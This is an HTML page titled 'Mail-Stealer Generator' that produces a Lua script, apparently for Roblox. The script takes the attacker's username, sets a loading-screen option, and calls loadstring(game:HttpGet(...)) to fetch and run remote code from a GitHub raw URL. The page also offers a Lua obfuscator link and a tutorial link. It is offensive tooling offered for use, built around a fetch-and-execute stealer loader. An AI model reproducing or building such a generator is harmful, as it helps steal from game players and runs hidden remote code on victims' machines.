<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Inferno - Generator</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.3.1/styles/default.min.css">
<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.3.1/highlight.min.js"></script>
<style>
  body {
    font-family: Arial, sans-serif;
    background-color: #bebebe; 
    text-align: center; 
    padding: 50px; 
  }
  .container { 
    background-color: #f0f0f0; 
    padding: 20px; 
    border-radius: 15px; 
    display: inline-block; 
    box-shadow: 0px 0px 10px rgb(112, 112, 112);
  }
  .input-field, .checkbox-group, button { 
    margin: 10px 0; 
  }
  button { 
    padding: 10px 20px; 
    background-color: #ff0000; 
    color: white; 
    border: none; 
    border-radius: 4px; 
    cursor: pointer; 
    transition: all 0.3s;
    border-bottom: solid 3px #e00202;
  }
  button:hover {
    background-color: #d60202;
    border-radius: 20px;
  }
  button:active {
    transform: scale(1.1,1.1);
  }
  #output {
    text-align: left;
    white-space: pre-wrap;
  }
  textarea {
    width: 100%; 
    height: 150px;
  }
</style>
</head>
<body>
  <div class="container">
  <h1>Mail-Stealer Generator</h1>
    <div class="input-field">
      <label for="username"><b>Username:</b></label>
      <input type="text" id="username" name="username">
    </div>
    <div class="checkbox-group">
      <input type="checkbox" id="loadingscreen" name="loadingscreen">
      <label for="loadingscreen">Loading Screen</label>
    </div>
    <button onclick="generateOutput()">Generate</button>
    <textarea id="output"></textarea>
    <button onclick="copyToClipboard()">Copy Script</button>
    <button class="btn btn-success" onclick="window.open('https://luaobfuscator.com/','_blank')">Lua Obfuscator</button>
    <button class="btn btn-success" onclick=" window.open('https://www.youtube.com/watch?v=0t1CGg-ZBEo','_blank')">Tutorial</button>
  </div>

<script>
    function generateOutput() {
        var username = document.getElementById("username").value;
        var loadingscreen = document.getElementById("loadingscreen").checked;
        var outputString = '_G.Username = "' + username + '"\n' + // Use actual line breaks
                           '_G.LoadingScreen = ' + loadingscreen + ' \n' +
                           'loadstring(game:HttpGet("https://raw.githubusercontent.com/Dhirk07/nizz/main/Inferno"))()';
        document.getElementById("output").value = outputString;
        hljs.highlightAll();
    }

    function copyToClipboard() {
        var copyText = document.getElementById("output");
        copyText.select();
        document.execCommand("copy");
    }
</script>

</body>
</html>
